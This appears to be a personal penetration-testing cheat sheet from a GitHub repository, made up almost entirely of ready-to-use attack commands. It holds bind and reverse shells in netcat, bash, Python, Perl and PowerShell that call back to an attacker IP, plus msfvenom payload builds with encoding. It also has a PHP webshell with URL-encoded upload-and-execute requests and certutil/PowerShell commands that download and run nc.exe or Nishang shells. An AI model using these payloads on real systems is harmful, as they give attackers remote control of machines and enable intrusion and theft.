mxhelp/mxreverse at main · mikes-hacks/mxhelp · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
===================================
Reverse Ports: 80, 443, 53, 21

===================================
Bind
nc -nlvp 443 -e cmd.exe    ..Windows: Share cmd (to anyone)
nc -nv 192.168.200.5 443      ..Linux: Connect to remote cmd

===================================
Favorites

msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.162.46 LPORT=4443 -f elf > shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.162.46 LPORT=443 -f exe > shell.exe

===================================
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.162.46 LPORT=443 -f exe > shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.162.46 LPORT=443 -e x86/shikata_ga_nai -f exe -o shellenc.exe
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.162.46 LPORT=443 -f raw > venomshell.jsp

windows/shell/reverse_tcp            ..staged
windows/shell_reverse_tcp            ..non-staged
windows/x64/shell_reverse_tcp        ..staged
linux/x86/shell/reverse_tcp          ..linux 32bit staged
linux/x86/shell_reverse_tcp          ..non-staged
linux/x64/shell/reverse_tcp          ..staged

===================================
php
~/tools/privesc_windows/windows-php-reverse-shell.php

vim shell.php
<?php
system($_REQUEST['cmd']);
?>

Upload/Execute
http://site/images/shell.php?cmd=whoami
curl http://site/images/shell.php?cmd=whoami
http://site/shell.php?cmd=bash -c "bash -i >& /dev/tcp/192.168.162.46/8080 0>&1"
curl 'http://site/images/shell.php?cmd=bash+-c+"bash+-i+>%26+/dev/tcp/192.168.162.46/8080+0>%261"'
http://site/shell.php?cmd=bash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.162.46%2F8080+0%3E%261%22
nc -nvlp 8080


===================================
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/192.168.162.46/80 0>&1'

===================================
Reverse
nc -nv 192.168.162.46 443 -e /bin/bash
nc -nv 192.168.162.46 443 -e cmd.exe
/bin/nc -e /bin/bash 192.168.162.46 80
netcat -e /bin/bash 192.168.162.46 443
bash -i >& /dev/tcp/192.168.162.46/443 0>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.162.46 443 > /tmp/f
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.162.46",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python3 -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.162.46",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

cat <<EOF> /var/www/html/script.py
#!/usr/bin/env python
import os,socket,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.162.46",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")
EOF

===================================
Catch a dying shell
kali> vim perl.shell
perl -e 'use Socket;$i="192.168.162.46";$p=445;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
kali> cat perl.shell | nc -lnvp 443   ..listen on 443, re-send to 445
kali> nc -lvnp 445

===================================
Windows
cmd.exe -a "/c certutil -urlcache -split -f http://192.168.162.46/nc.exe c:/windows/temp/nc.exe"
cmd.exe -a "/c c:/windows/temp/nc.exe 192.168.162.46 443 -e cmd.exe"

Windows Webshell
http://192.168.200.5/webshell.php?cmd=certutil -urlcache -split -f http://192.168.162.46/nc.exe c:/windows/temp/nc.exe
http://192.168.200.5/webshell.php?cmd=c:/windows/temp/nc.exe 192.168.162.46 443 -e cmd.exe

===================================
Windows PHP
https://github.com/Dhayalanb/windows-php-reverse-shell
vim windows-php-reverse-shell
ftp 192.168.200.5
put windows-php-reverse-shell.php
http://192.168.200.5/windows-php-reverse-shell.php

===================================
Windows PHP and Powershell
sudo python -m SimpleHTTPServer 80
<?php exec("powershell wget 192.168.162.46/nc.exe -O nc.exe && nc.exe 192.168.162.46 443 -e cmd.exe"); ?>
nc -nvlp 443

===================================
Windows Nishang
cp /opt/powershell/nishang/Shells/Invoke-PowerShellTcp.ps1 ./shang.ps1
vim shang.ps1
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.162.46 -Port 443
python3 -m http.server 80
http://page/log.php?cmd=
urlencode "powershell -c iex(new-object net.webclient).downloadstring('http://192.168.162.46/shang.ps1')"

===================================
Windows - Powershell-One-Liner
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.162.46',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close()"

===================================
Consider: mxrootbash